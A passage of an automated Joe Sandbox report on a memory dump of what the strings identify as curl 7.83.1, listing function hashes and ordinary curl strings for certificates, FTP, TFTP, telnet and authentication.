                            • String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$Expire Date$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$Version
                            • API String ID: 0-2896079655
                            • Opcode ID: 0f2055358cee03638fd404180435ac1685d668468cdddf8e577dba41469b2e77
                            • Instruction ID: 06b7e7365d7f5dfd08c09d7a923ea56a3567d2951bb76fc4040341e629d8a585
                            • Opcode Fuzzy Hash: 0f2055358cee03638fd404180435ac1685d668468cdddf8e577dba41469b2e77
                            • Instruction Fuzzy Hash: D9F19E51E08B8355EB19FB2A94902B9A7A1AF59B86FC08031CD2E173D5DFBDE501C3E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: ECC Public Key (%lu bits)$ RSA Public Key (%lu bits)$%lu$ECC Public Key$RSA Public Key$dh(g)$dh(p)$dh(pub_key)$dhpublicnumber$dsa$dsa(g)$dsa(p)$dsa(pub_key)$dsa(q)$ecPublicKey$rsa(e)$rsa(n)$rsaEncryption
                            • API String ID: 1488884202-625760584
                            • Opcode ID: ebfa71fa7c7e718fc8c77f87c6f19b6dd2cf363493f9df9788ff38d80edcb3b7
                            • Instruction ID: 123d76a4f22259a2355e9fb1c2f35ef85bb4fe351333a417fb64e1a677c45bbe
                            • Opcode Fuzzy Hash: ebfa71fa7c7e718fc8c77f87c6f19b6dd2cf363493f9df9788ff38d80edcb3b7
                            • Instruction Fuzzy Hash: 25914B56A08A4394FB18FB62A4106F993B1AF45786FC48036DD2E536C9DFBCE506C3E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _errno$freestrtok$__swprintf_l_mkdir_strdupmalloc
                            • String ID: %s resides on a read-only file system.$%s%s$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
                            • API String ID: 3627321920-1086585624
                            • Opcode ID: 6eff02cbc8d66afcaa98fc4a1725345a58611d285cda82159f459e3338dc17c6
                            • Instruction ID: bbaf1ced665e14a73ec8242b99b3641b1b9af0d73aea4e0c8d4a6acd195e1888
                            • Opcode Fuzzy Hash: 6eff02cbc8d66afcaa98fc4a1725345a58611d285cda82159f459e3338dc17c6
                            • Instruction Fuzzy Hash: 75519D20A0964285FB19BB59A850078A2B0AF45BA1FD48639C93D036E9DFFCE545C3E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _mbschr_mbsnbcmp
                            • String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Services$Users
                            • API String ID: 866314863-3209074899
                            • Opcode ID: dcb420e6af7ed672b1d66cf765ca847a72a8d3dc008a2866f8cb8f78b5c8db5a
                            • Instruction ID: b3e2d2471553936425895092a5d2fbd8ccadcfbbbc9bb04f5d4785cc212b19e2
                            • Opcode Fuzzy Hash: dcb420e6af7ed672b1d66cf765ca847a72a8d3dc008a2866f8cb8f78b5c8db5a
                            • Instruction Fuzzy Hash: 15414C61A0C74285FB15AF51E80037AB7A5AF45BC9F809135CD6D866D8EFFCE042D3A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$malloc
                            • String ID: (curl_seek_callback) fseek, NULL, stdin);$curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);$curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \$curl_mime_encoder(part%d, "%s");$curl_mime_filedata(part%d, "%s");$curl_mime_filename(part%d, "%s");$curl_mime_filename(part%d, NULL);$curl_mime_headers(part%d, slist%d, 1);$curl_mime_name(part%d, "%s");$curl_mime_subparts(part%d, mime%d);$curl_mime_type(part%d, "%s");$mime%d = NULL;$part%d = curl_mime_addpart(mime%d);$slist%d = NULL;
                            • API String ID: 2190258309-2644548734
                            • Opcode ID: 7d02b751a735bf8e5157fd66c9156fad4350745057d9674ba27a8b98467552ab
                            • Instruction ID: 7c1448d27ea77a05cc09178aad1e138a52a43224cbab166e54ce832ba7c2574f
                            • Opcode Fuzzy Hash: 7d02b751a735bf8e5157fd66c9156fad4350745057d9674ba27a8b98467552ab
                            • Instruction Fuzzy Hash: 76917C20B1860352EB25FB669450279A3A4BF457E0FC00635DD3E477E6EFECE50083A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strcmp
                            • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
                            • API String ID: 1004003707-2602438971
                            • Opcode ID: e5b9489c4a7d59454e74786cae9f9c2fbde0a171d3e207f34751b12bbbc6c6d4
                            • Instruction ID: 151cad7ec0245112ba80f207c22b28f71543fa71954466829b3a1eca97bdbf39
                            • Opcode Fuzzy Hash: e5b9489c4a7d59454e74786cae9f9c2fbde0a171d3e207f34751b12bbbc6c6d4
                            • Instruction Fuzzy Hash: E7515B21A0CA8784FB1CBB20C4852F8A7B59F5574AFC48031D96E461C5EFEDE586C3E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _errno$strtoul$__stdio_common_vsscanf
                            • String ID: %c-%c%c$bad range$bad range specification$range overflow
                            • API String ID: 3842623485-566611384
                            • Opcode ID: 6b9b44a0b3eab79b6cbb08dd0d0fc17d2b6d791b45ac79dfc8682ee1c2e2b9ca
                            • Instruction ID: 9c79089a9cbd42a81a1fc0d176fa6ec56a6a25ed0df57b8e9e4e8f0799d03a40
                            • Opcode Fuzzy Hash: 6b9b44a0b3eab79b6cbb08dd0d0fc17d2b6d791b45ac79dfc8682ee1c2e2b9ca
                            • Instruction Fuzzy Hash: 10C1E032A096868AF718EF269854178B7B1FB45744FC58039CA6E433C2CFBCE805E760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l$ErrorLastsendto
                            • String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
                            • API String ID: 1110826907-119092532
                            • Opcode ID: 924714a4dbd8d2f9a79742bf5bf45ff3e37ff149f52cb34c798acb0c79d0ee81
                            • Instruction ID: b0070d12934a7e8a48f6f5402ecadca3b5a348c39e3bd7a42a52665c87356f04
                            • Opcode Fuzzy Hash: 924714a4dbd8d2f9a79742bf5bf45ff3e37ff149f52cb34c798acb0c79d0ee81
                            • Instruction Fuzzy Hash: 95C1B472A08A8682EB18EF25D5402F9A370FB45798F840532DA6D4B7D5CFBCE405C7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DE915F
                            • GetFileSizeEx.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1DE91F3
                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DE91FD
                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1DE9296
                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1DE92DB
                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DE932C
                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DE916C
                              • Part of subcall function 00007FF7F1DAEAE8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEB01
                              • Part of subcall function 00007FF7F1DAEAE8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEB09
                              • Part of subcall function 00007FF7F1DAEAE8: __swprintf_l.LIBCMT ref: 00007FF7F1DAEB3F
                              • Part of subcall function 00007FF7F1DAEAE8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEB44
                              • Part of subcall function 00007FF7F1DAEAE8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEB4E
                              • Part of subcall function 00007FF7F1DAEAE8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEB56
                              • Part of subcall function 00007FF7F1DAEAE8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEB62
                            • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1DE91C1
                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DE91D0
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DE92F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast$File_errno$CloseCreateHandleReadSize__swprintf_l_strdupfree
                            • String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
                            • API String ID: 4049688911-3430970913
                            • Opcode ID: 9fcb51790bb0b48e6003486fe19f760fa10fe2a47cb6682ff324c8ada3500fe1
                            • Instruction ID: cf5fec56ed6d022fe7e0378859bb61c06204ffa352708bc66c7a26f712a10a8f
                            • Opcode Fuzzy Hash: 9fcb51790bb0b48e6003486fe19f760fa10fe2a47cb6682ff324c8ada3500fe1
                            • Instruction Fuzzy Hash: B451A821A0D64246EB18BB15A4503BAA3B0BF88799FC48131ED2D477D5DFBCE504D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,000000A0,?,?,00000000,00007FF7F1D9B11E,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F1DA341F
                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1DA3646
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __acrt_iob_funcfputc
                            • String ID: %header{$curl: unknown --write-out variable: '%s'$header{
                            • API String ID: 2340846889-221383536
                            • Opcode ID: a8ce164e3c89f8d1c334f1ba5bc17eee4447ed61ec8e2329ce53e818711a30d2
                            • Instruction ID: 77e3ae7336feb5d03308c65352c64a8ffcd9a3df09d59cafaead2342dbaab44b
                            • Opcode Fuzzy Hash: a8ce164e3c89f8d1c334f1ba5bc17eee4447ed61ec8e2329ce53e818711a30d2
                            • Instruction Fuzzy Hash: EB71BF21E0C68291FB69EB19A514279E7B3AB45B84FC84435CA6E073D6DFECF405C3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strncpy$__swprintf_l
                            • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                            • API String ID: 36022466-748038847
                            • Opcode ID: 42ee85beba19638c58b992d5fac87fdd081941d39d71668fd91904736a517bfe
                            • Instruction ID: 40d4a3019a6a7a6ae692e1875f8a1f288d57483b9ca1a3cfca5443ef585f1d0e
                            • Opcode Fuzzy Hash: 42ee85beba19638c58b992d5fac87fdd081941d39d71668fd91904736a517bfe
                            • Instruction Fuzzy Hash: 4B815D32A08A86A5EB18EF21D9406E9B371FB48788FC54072DA6D472D5DFBCE514C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: %s auth using %s with user '%s'$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-authorization$Server
                            • API String ID: 1992661772-237531397
                            • Opcode ID: 4488098f46b09f30fcb668fade2f7909394647ef9a85e17a79884b628fcabadf
                            • Instruction ID: 6e3a412dd616758b498a1cbdb05a393a99fa9eb68403640959f05257f411be80
                            • Opcode Fuzzy Hash: 4488098f46b09f30fcb668fade2f7909394647ef9a85e17a79884b628fcabadf
                            • Instruction Fuzzy Hash: F1517B21A0868394EB24AB1994402B9A7A0FF15788FC44832EA2D837D5DFBDE645C3F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: puts$__acrt_iob_funcqsortstrcmp
                            • String ID: %s$%s $2022-05-13$7.83.1$Features:$Protocols: $Release-Date: %s$WARNING: curl and libcurl versions do not match. Functionality may be affected.$curl 7.83.1 (Windows) %s
                            • API String ID: 2220958200-3826092985
                            • Opcode ID: 41133b786f8199fb09a4f6f87421efb745891282f17b25aace062c49a5d03537
                            • Instruction ID: 2c57250a6618afc63551c34d993021a0e6a5e3eaf6877ae2d84cf6a2dc944898
                            • Opcode Fuzzy Hash: 41133b786f8199fb09a4f6f87421efb745891282f17b25aace062c49a5d03537
                            • Instruction Fuzzy Hash: 89414822A0894A91EB14FB15E8502B9F371FF45789FC44132D92D432E9DFACF549CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __stdio_common_vsscanf_scwprintf
                            • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                            • API String ID: 2840981943-1503635593
                            • Opcode ID: 24f0d0b65d79883abe30de6639a4ded8ae393e2128ed8564cf185befcb9e77a8
                            • Instruction ID: 00e65474dd29ee5775f8bc2ee7f1506da7f0c272359df568569d0e348005221f
                            • Opcode Fuzzy Hash: 24f0d0b65d79883abe30de6639a4ded8ae393e2128ed8564cf185befcb9e77a8
                            • Instruction Fuzzy Hash: 73E18562B0C682A2EB58EB25E4402BAF7B4FB44784F840035DA6D077D5DFBCE564C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 00007FF7F1D923EE
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ByteCharConsoleMultiWidefree$BufferInfoScreenWrite_fileno_get_osfhandle_scwprintffflushfwritemalloc
                            • String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
                            • API String ID: 662453125-3734715646
                            • Opcode ID: 86b10ed755fe1a630f016f0a566d003ef7c7c659b000f18f7e48d25883bf41e5
                            • Instruction ID: 139d4c370cc69f25cbc16cd54337a9eb39d1da758429d0f893c079967b4abf19
                            • Opcode Fuzzy Hash: 86b10ed755fe1a630f016f0a566d003ef7c7c659b000f18f7e48d25883bf41e5
                            • Instruction Fuzzy Hash: A151A462A1974282FB58AB22E814379A7B0FB84B84FC44439DE5E477D5DFBCE441C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                            • API String ID: 1488884202-265991785
                            • Opcode ID: de3544bb73964b05517af390cdf018ffb7b67abb6b11d238282409319dbadfc8
                            • Instruction ID: 42a909dd1279e5a740cf8e32c5c77cafbdcab0e29aaddc90b34457d0f542ac4d
                            • Opcode Fuzzy Hash: de3544bb73964b05517af390cdf018ffb7b67abb6b11d238282409319dbadfc8
                            • Instruction Fuzzy Hash: FFE1E122A087CA85EB64EB2495503B9B7B0BF45394FC54136CE7D072D5CFBCA444CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: %zx%s$Malformatted trailing header, skipping trailer$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                            • API String ID: 1488884202-2453975552
                            • Opcode ID: 25d3e7d7c40f438dfdbc583a0009ea452bda80cfe638505eb4e86c40afad6384
                            • Instruction ID: 0aac66b1c90990f9420a616cb3f5d84757aca49fe1ea92d2589856b4b713a8c4
                            • Opcode Fuzzy Hash: 25d3e7d7c40f438dfdbc583a0009ea452bda80cfe638505eb4e86c40afad6384
                            • Instruction Fuzzy Hash: 9EE1A122A08692E6EB59EB1191403B9E7B8FB05B84F884535DA7D073D5DFBCE460C3E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
